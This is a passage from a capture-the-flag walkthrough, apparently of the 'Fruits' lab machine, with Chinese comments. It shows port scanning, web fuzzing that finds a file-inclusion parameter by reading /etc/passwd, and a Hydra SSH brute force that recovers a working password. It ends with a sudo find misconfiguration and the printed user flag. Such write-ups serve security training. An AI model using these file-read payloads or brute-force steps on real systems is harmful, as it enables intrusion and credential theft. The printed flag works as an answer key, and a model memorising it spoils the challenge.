❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- I don't always scan ports, but when I do, I prefer RustScan.
[~] The config file is expected to be at "/home/ctf/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.56.108:22 Open 192.168.56.108:80 [~] Starting Script(s) [~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 22:45 CST Initiating Ping Scan at 22:45 Scanning 192.168.56.108 [4 ports] Completed Ping Scan at 22:45, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 22:45 Completed Parallel DNS resolution of 1 host. at 22:45, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 22:45 Scanning 192.168.56.108 [2 ports] Discovered open port 80/tcp on 192.168.56.108 Discovered open port 22/tcp on 192.168.56.108 Completed SYN Stealth Scan at 22:45, 0.04s elapsed (2 total ports) Nmap scan report for 192.168.56.108 Host is up, received reset ttl 63 (0.00096s latency). Scanned at 2024-12-09 22:45:11 CST for 0s PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds Raw packets sent: 6 (240B) | Rcvd: 3 (128B)
❯ wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.56.108/FUZZ.php --hc 404 --hh 301 ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://192.168.56.108/FUZZ.php Total requests: 207643
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000001: 200 65 L 168 W 1811 Ch "# directory-list-lowercase-2.3-medium.txt" 000000007: 200 65 L 168 W 1811 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/" 000000003: 200 65 L 168 W 1811 Ch "# Copyright 2007 James Fisher" 000000012: 200 65 L 168 W 1811 Ch "# on atleast 2 different hosts" 000000013: 200 65 L 168 W 1811 Ch "#" 000000014: 403 9 L 28 W 279 Ch "http://192.168.56.108/.php" 000000011: 200 65 L 168 W 1811 Ch "# Priority ordered case insensative list, where entries were found" 000000004: 200 65 L 168 W 1811 Ch "#" 000000008: 200 65 L 168 W 1811 Ch "# or send a letter to Creative Commons, 171 Second Street," 000000009: 200 65 L 168 W 1811 Ch "# Suite 300, San Francisco, California, 94105, USA." 000000005: 200 65 L 168 W 1811 Ch "# This work is licensed under the Creative Commons" 000000010: 200 65 L 168 W 1811 Ch "#" 000000002: 200 65 L 168 W 1811 Ch "#" 000000006: 200 65 L 168 W 1811 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this" 000041849: 403 9 L 28 W 279 Ch "http://192.168.56.108/.php" 000060475: 200 1 L 0 W 1 Ch "fruits"
******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://192.168.56.108/fruits.php?FUZZ=/etc/passwd Total requests: 207643
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000741: 200 24 L 29 W 1128 Ch "file" ^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
❯ hydra -l bananaman -P /usr/share/wordlists/rockyou.txt ssh://$ip Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-09 23:13:45 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.56.108:22/ [STATUS] 215.00 tries/min, 215 tries in 00:01h, 14344187 to doin 1111:58h, 13 active [22][ssh] host: 192.168.56.108 login: bananaman password: celtic 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 4 final worker threads did not complete until end. [ERROR] 4 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-09 23:14:59
还真让我爆破到了
用户提权
1 2 3 4 5 6 7 8 9 10 11 12
ssh bananaman@$ip The authenticity of host '192.168.56.108 (192.168.56.108)' can't be established. ED25519 key fingerprint is SHA256:TF64A9yYMMZOZ2SQ5h4PGrHQ7iMqyvBMmX8ai4/Cznc. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.108' (ED25519) to the list of known hosts bananaman@Fruits:~$ sudo -l Matching Defaults entries for bananaman on Fruits: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User bananaman may run the following commands on Fruits: (ALL) NOPASSWD: /usr/bin/find
这里没啥好收集的,就发现用户有sudo权限,顺便把user的flag交了
1 2 3 4
bananaman@Fruits:~$ ls user.txt bananaman@Fruits:~$ cat user.txt 482c811da5d5b4bc6d497ffa98491e38
